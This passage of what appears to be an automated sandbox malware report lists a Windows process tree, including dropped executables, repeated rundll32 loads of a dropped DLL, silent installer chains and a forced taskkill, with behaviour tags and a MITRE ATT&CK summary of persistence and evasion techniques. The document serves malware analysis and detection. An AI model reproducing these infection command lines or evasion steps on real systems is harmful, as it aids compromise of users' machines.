C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:6084 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:5700
-
-
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵PID:9476
-
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵PID:9432
-
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵PID:8892
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:9152
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:316
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09b2a8bc4f16cb.exeWed09b2a8bc4f16cb.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3908
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09abf83d9c2.exe"C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09abf83d9c2.exe" -u1⤵
- Executes dropped EXE
PID:3392
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09d27135e5a8b3b.exeWed09d27135e5a8b3b.exe1⤵
- Executes dropped EXE
PID:3196 -
C:\Users\Admin\AppData\Local\Temp\is-515AS.tmp\Wed09d27135e5a8b3b.tmp"C:\Users\Admin\AppData\Local\Temp\is-515AS.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$3014A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09d27135e5a8b3b.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3724 -
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09d27135e5a8b3b.exe"C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09d27135e5a8b3b.exe" /SILENT3⤵
- Executes dropped EXE
PID:2840 -
C:\Users\Admin\AppData\Local\Temp\is-AKJLL.tmp\Wed09d27135e5a8b3b.tmp"C:\Users\Admin\AppData\Local\Temp\is-AKJLL.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$40252,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09d27135e5a8b3b.exe" /SILENT4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:4216 -
C:\Users\Admin\AppData\Local\Temp\is-VDMB4.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-VDMB4.tmp\postback.exe" ss15⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:3640
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09abf83d9c2.exeWed09abf83d9c2.exe1⤵
- Executes dropped EXE
PID:3168
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2328
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3216 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:2812
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4268
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5080
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6224 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:6268
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵PID:6776
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5156
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4224
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:6784 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7EFB9BBD187FF27DBC1D4BA970876DC3 C2⤵PID:9768
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9955E94FFE79699A67C23EA3977BC4282⤵
- Blocklisted process makes network request
PID:4288 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:6060 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5748
-
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2E20CC61DCE61B3AF9F30DD8C055C547 E Global\MSI00002⤵PID:2260
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:9232
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:9480
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7556
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5632 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:4992
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4448 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5892
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5884 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1524
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4236 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1660
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
- Checks whether UAC is enabled
PID:3640 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:3756
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:9684
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:8148
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:992
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2420
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: MapViewOfSection
PID:3900
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:64
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx -s AppXSvc1⤵PID:4808
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8708
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3992
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:8936
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:9608
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess1⤵PID:6900
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:7532
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:6516
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:356
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
Disabling Security Tools
1File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
5Virtualization/Sandbox Evasion
1Web Service
1